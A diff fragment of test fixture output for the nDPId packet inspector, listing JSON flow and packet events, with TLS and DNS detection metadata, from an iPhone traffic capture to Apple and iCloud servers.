+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454598427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598427,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGslMRggIuwKgCEQG7xZHfrwWiGTrrGKBSqbCWRAAAAgQFrAQCCAq1T9HeEd\/nUwEDAw4="} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454598453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598453,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZNpWNRgMiTvFqBScNC35wAAAgQFrAQCCAoAH8DDEd\/neQEDAwg="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454598459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598459,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZLy+qnpfzqpjaBScNDegAAAAgQFrAQCCAqK\/qiVEd\/ndwEDAwg="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454598542,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598542,"pkt":"xiwDYGpkxGGLNYKpCABFAABAIN8AAP8RFWvAqAIRwKgCAc50ADUALLvssQ8BAAABAAAAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQAB"} 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454598544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598544,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysAAAFAslesym7UszoAQCBZUCQAAAQEIChHf5+gdNCSF"} -00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZFvAqAIREYICLsWRAbsZOusY368Fo4AQBAtqWAAAAQEIChHf5\/C1T9He"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWTAbsyJO8WaVjUYYAQBAtTNAAAAQEIChHf5\/cAH8DD"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWSAbt\/OqmN8vqp6oAQBAt5ywAAAQEIChHf5\/eK\/qiV"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454598544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598544,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysAAAFAslesym7UszoAQCBZUCQAAAQEIChHf5+gdNCSF"} +00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1582454598545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZFvAqAIREYICLsWRAbsZOusY368Fo4AQBAtqWAAAAQEIChHf5\/C1T9He"} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWTAbsyJO8WaVjUYYAQBAtTNAAAAQEIChHf5\/cAH8DD"} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWSAbt\/OqmN8vqp6oAQBAt5ywAAAQEIChHf5\/eK\/qiV"} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454598582,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1582454598582,"pkt":"xGGLNYKpxiwDYGpkCABFAADmpdwAAEARTsjAqAIBwKgCEQA1znQA0sdAsQ+BgAABAAkAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAaB2dhdGV3YXkCZmUJYXBwbGUtZG5zA25ldADAMAABAAEAAAAiAAQR+LBLwDAAAQABAAAAIgAEEfixhcAwAAEAAQAAACIABBH4sCjAMAABAAEAAAAiAAQR+LCNwDAAAQABAAAAIgAEEfiwTcAwAAEAAQAAACIABBH4sWXAMAABAAEAAAAiAAQR+LGqwDAAAQABAAAAIgAEEfiwiQ=="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598582,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.176.75"}} 